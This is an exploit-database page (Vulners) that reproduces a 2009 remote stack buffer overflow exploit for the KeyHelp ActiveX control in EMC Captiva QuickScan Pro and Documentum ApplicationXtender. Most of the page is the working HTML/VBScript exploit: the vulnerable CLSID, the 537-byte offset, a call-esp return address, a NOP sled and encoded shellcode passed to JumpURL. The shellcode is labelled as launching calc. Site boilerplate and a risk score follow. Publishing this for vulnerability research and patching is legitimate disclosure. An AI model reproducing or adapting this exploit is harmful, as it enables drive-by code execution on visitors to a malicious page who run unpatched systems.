Vulners
Lucene search
EMC Captiva QuickScan Pro 4.6 SP1 and EMC Documentum ApllicationXtender Desktop 5.4 (keyhelp.ocx 1.2.312) - Remote Overflow
<!--
EMC multiple products KeyWorks KeyHelp Module (keyhelp.ocx 1.2.312) remote
buffer overflow exploit
(ie8 xp sp3)
by Nine:Situations:Group::pyrokinesis
site: http://retrogod.altervista.org/
tested products:
EMC Captiva QuickScan Pro 4.6 sp1
EMC Documentum ApllicationXtender Desktop 5.4
and possibly other products carrying quickscan
CLSID: {B7ECFD41-BE62-11D2-B9A8-00104B138C8C}
Progid: KeyHelp.KeyCtrl.1
Binary Path: C:\WINDOWS\system32\KeyHelp.ocx
KillBitted: False
Implements IObjectSafety: True
Safe For Initialization (IObjectSafety): True
Safe For Scripting (IObjectSafety): True
JumpMaddedID() and JumpURL() methods suffer of the same stack based buffer overflow
eip is overwritten after 537 bytes through the second argument, you can touch SEH even
-->
<html>
<object classid='clsid:B7ECFD41-BE62-11D2-B9A8-00104B138C8C' id='KEYHELPLib' />
</object>
<script language='vbscript'>
//executing calc
scode = unescape("%eb%03%59%eb%05%e8%f8%ff%ff%ff%4f%49%49%49%49%49") & _
unescape("%49%51%5a%56%54%58%36%33%30%56%58%34%41%30%42%36") & _
unescape("%48%48%30%42%33%30%42%43%56%58%32%42%44%42%48%34") & _
unescape("%41%32%41%44%30%41%44%54%42%44%51%42%30%41%44%41") & _
unescape("%56%58%34%5a%38%42%44%4a%4f%4d%4e%4f%4a%4e%46%54") & _
unescape("%42%30%42%50%42%50%4b%58%45%54%4e%53%4b%58%4e%37") & _
unescape("%45%50%4a%47%41%30%4f%4e%4b%38%4f%44%4a%51%4b%48") & _
unescape("%4f%55%42%42%41%30%4b%4e%49%44%4b%48%46%43%4b%38") & _
unescape("%41%30%50%4e%41%53%42%4c%49%49%4e%4a%46%58%42%4c") & _
unescape("%46%57%47%50%41%4c%4c%4c%4d%50%41%30%44%4c%4b%4e") & _
unescape("%46%4f%4b%53%46%35%46%32%46%30%45%37%45%4e%4b%48") & _
unescape("%4f%35%46%32%41%50%4b%4e%48%56%4b%38%4e%50%4b%54") & _
unescape("%4b%48%4f%55%4e%31%41%30%4b%4e%4b%38%4e%41%4b%38") & _
unescape("%41%30%4b%4e%49%58%4e%35%46%42%46%50%43%4c%41%43") & _
unescape("%42%4c%46%36%4b%48%42%34%42%33%45%38%42%4c%4a%37") & _
unescape("%4e%30%4b%48%42%34%4e%50%4b%48%42%57%4e%31%4d%4a") & _
unescape("%4b%38%4a%46%4a%50%4b%4e%49%50%4b%48%42%38%42%4b") & _
unescape("%42%30%42%50%42%30%4b%48%4a%36%4e%53%4f%35%41%33") & _
unescape("%48%4f%42%46%48%35%49%58%4a%4f%43%48%42%4c%4b%57") & _
unescape("%42%55%4a%46%42%4f%4c%48%46%50%4f%35%4a%46%4a%49") & _
unescape("%50%4f%4c%38%50%30%47%55%4f%4f%47%4e%43%56%41%36") & _
unescape("%4e%46%43%46%50%52%45%36%4a%37%45%36%42%30%5a")
jnk = string(537,"A")
eip = unescape("%67%41%41%7e") '0x7E414167 call esp user32.dll
nop = string(16,unescape("%90"))
mapID=1
pstrChmFile= jnk + eip + nop + scode
pstrFrame="aaaaaaaa"
'KEYHELPLib.JumpMappedID mapID,pstrChmFile,pstrFrame
KEYHELPLib.JumpURL mapID,pstrChmFile,pstrFrame
</script>Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
29 Sep 2009 00:00Current
7.4High risk
Vulners AI Score7.4